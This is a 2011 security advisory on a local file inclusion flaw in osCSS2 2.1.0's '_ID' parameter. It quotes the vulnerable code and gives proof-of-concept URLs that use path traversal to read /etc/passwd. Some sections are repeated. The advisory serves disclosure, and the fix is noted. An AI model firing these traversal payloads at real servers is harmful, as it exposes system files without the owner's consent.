SSCHADV2011-034 - osCSS2 "_ID" parameter Local file inclusion
Advisory:
|
osCSS2 "_ID" parameter Local file inclusion
|
Advisory ID:
|
SSCHADV2011-034
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on osCSS2 2.1.0 (latest version)
|
Vendor URL:
|
|
Vendor Status:
|
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
|
EDB-ID:
|
18099
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability
======================
Vulnerable code
======================
//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING} //content.php require($page->path_gabarit()); // includes/classes/page.php public function pile_file_lang($path_file){ global $lang; if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file; if(!in_array($path_file,(array)$this->PileFileLang)) include_once($path_file); } |
==============
PoC-Exploit
==============
==============
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd |
=====
Solution
=====
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
================
Disclosure Timeline
================
08-Nov-2011 – informed vendor
Solution
=====
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
================
Disclosure Timeline
================
08-Nov-2011 – informed vendor
08-Nov-2011 – release date of this security advisory
08-Nov-2011 – fixed by vendor
08-Nov-2011 – post on BugTraq
08-Nov-2011 – fixed by vendor
08-Nov-2011 – post on BugTraq
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
Comments
Display comments as Linear | Threaded